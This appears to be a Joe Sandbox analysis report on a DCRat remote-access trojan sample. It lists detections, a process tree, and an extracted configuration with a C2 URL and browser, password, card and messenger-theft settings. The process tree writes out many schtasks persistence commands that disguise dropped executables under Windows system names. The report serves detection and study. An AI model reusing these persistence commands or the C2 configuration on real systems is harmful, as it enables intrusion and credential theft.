Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1521601
MD5:8a0082dc4822b5f82dee8be67d86d402
SHA1:aa50f62b0ad60570db6d854ba2618f25a2b95882
SHA256:443b28843ef46edf389d28b02cb45b89ec6a871f87f5b8bbeee8bb5e1e609126
Tags:exeuser-jstrosch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8A0082DC4822B5F82DEE8BE67D86D402)
    • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • comProviderServer.exe (PID: 7800 cmdline: "C:\reviewDriverIntosessionnet\comProviderServer.exe" MD5: DEF21977FE76F2744669724D9A26A39F)
          • schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7900 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7916 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7932 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7992 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8008 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8056 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8112 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8128 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7260 cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4236 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6920 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1088 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 396 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5112 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7484 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7552 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7544 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6380 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5912 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • wscript.exe (PID: 7640 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"H\":\"(\",\"t\":\"!\",\"F\":\"%\",\"d\":\"|\",\"n\":\"#\",\"x\":\"^\",\"v\":\")\",\"P\":\">\",\"W\":\";\",\"y\":\"&\",\"c\":\"`\",\"G\":\"*\",\"i\":\" \",\"I\":\"$\",\"X\":\"~\",\"g\":\"@\",\"6\":\"-\",\"C\":\"<\",\"S\":\".\",\"3\":\",\",\"D\":\"_\"}", "PCRT": "{\"2\":\"#\",\"j\":\"^\",\"m\":\"(\",\"B\":\"$\",\"4\":\"_\",\"1\":\">\",\"i\":\"*\",\"U\":\")\",\"c\":\"-\",\"N\":\";\",\"Q\":\"`\",\"d\":\".\",\"z\":\"~\",\"V\":\"&\",\"T\":\",\",\"h\":\"!\",\"x\":\"%\",\"F\":\"@\",\"C\":\" \",\"X\":\"<\",\"R\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ihDIZlmnfSxSHTCWeZ2k", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "H2": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Process Memory Space: comProviderServer.exe PID: 7800JoeSecurity_DCRat_1Yara detected DCRatJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Files With System Process Name In Unsuspected Locations
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\reviewDriverIntosessionnet\comProviderServer.exe, ProcessId: 7800, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, CommandLine: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\reviewDriverIntosessionnet\comProviderServer.exe" , ParentImage: C:\reviewDriverIntosessionnet\comProviderServer.exe, ParentProcessId: 7800, ParentProcessName: comProviderServer.exe, ProcessCommandLine: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, ProcessId: 8056, ProcessName: schtasks.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7528, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , ProcessId: 7620, ProcessName: wscript.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Schedule system process
          Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\reviewDriverIntosessionnet\comProviderServer.exe" , ParentImage: C:\reviewDriverIntosessionnet\comProviderServer.exe, ParentProcessId: 7800, ParentProcessName: comProviderServer.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, ProcessId: 8188, ProcessName: schtasks.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\reviewDriverIntosessionnet\spoolsv.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Users\user\AppData\Local\Temp\vEbYiTsQ2u.batAvira: detection malicious, Label: BAT/Delbat.C
          Source: C:\Users\Public\Downloads\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Users\user\wscript.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\reviewDriverIntosessionnet\V50gFn.vbeAvira: detection malicious, Label: VBS/Runner.VPG
          Source: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Found malware configuration
          Source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"H\":\"(\",\"t\":\"!\",\"F\":\"%\",\"d\":\"|\",\"n\":\"#\",\"x\":\"^\",\"v\":\")\",\"P\":\">\",\"W\":\";\",\"y\":\"&\",\"c\":\"`\",\"G\":\"*\",\"i\":\" \",\"I\":\"$\",\"X\":\"~\",\"g\":\"@\",\"6\":\"-\",\"C\":\"<\",\"S\":\".\",\"3\":\",\",\"D\":\"_\"}", "PCRT": "{\"2\":\"#\",\"j\":\"^\",\"m\":\"(\",\"B\":\"$\",\"4\":\"_\",\"1\":\">\",\"i\":\"*\",\"U\":\")\",\"c\":\"-\",\"N\":\";\",\"Q\":\"`\",\"d\":\".\",\"z\":\"~\",\"V\":\"&\",\"T\":\",\",\"h\":\"!\",\"x\":\"%\",\"F\":\"@\",\"C\":\" \",\"X\":\"<\",\"R\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ihDIZlmnfSxSHTCWeZ2k", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "H2": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "T": "0"}
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 60%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJoe Sandbox ML: detected
          Source: C:\reviewDriverIntosessionnet\spoolsv.exeJoe Sandbox ML: detected
          Source: C:\Users\Public\Downloads\explorer.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJoe Sandbox ML: detected
          Source: C:\Users\user\wscript.exeJoe Sandbox ML: detected
          Source: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeJoe Sandbox ML: detected
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJoe Sandbox ML: detected
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\c5b4cb5e9653ccJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Sidebar\WmiPrvSE.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Sidebar\24dbde2999530eJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\MSBuild\48b6e448d1d68fJump to behavior
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00B8A5F4
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00B9B8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAAAA8 FindFirstFileExA,1_2_00BAAAA8
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\userJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://nezik.ru.swtest.ru/@=ETYmFWY1UWO
          Source: comProviderServer.exe, 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00B8718C
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\55b276f4edf653Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8857B1_2_00B8857B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B970BF1_2_00B970BF
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAD00E1_2_00BAD00E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8407E1_2_00B8407E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB11941_2_00BB1194
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8E2A01_2_00B8E2A0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B832811_2_00B83281
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA02F61_2_00BA02F6
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B966461_2_00B96646
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B827E81_2_00B827E8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B937C11_2_00B937C1
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA473A1_2_00BA473A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA070E1_2_00BA070E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8E8A01_2_00B8E8A0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8F9681_2_00B8F968
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA49691_2_00BA4969
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B93A3C1_2_00B93A3C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B96A7B1_2_00B96A7B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BACB601_2_00BACB60
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA0B431_2_00BA0B43
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B95C771_2_00B95C77
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9FDFA1_2_00B9FDFA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8ED141_2_00B8ED14
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B93D6D1_2_00B93D6D
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8BE131_2_00B8BE13
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8DE6C1_2_00B8DE6C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B85F3C1_2_00B85F3C
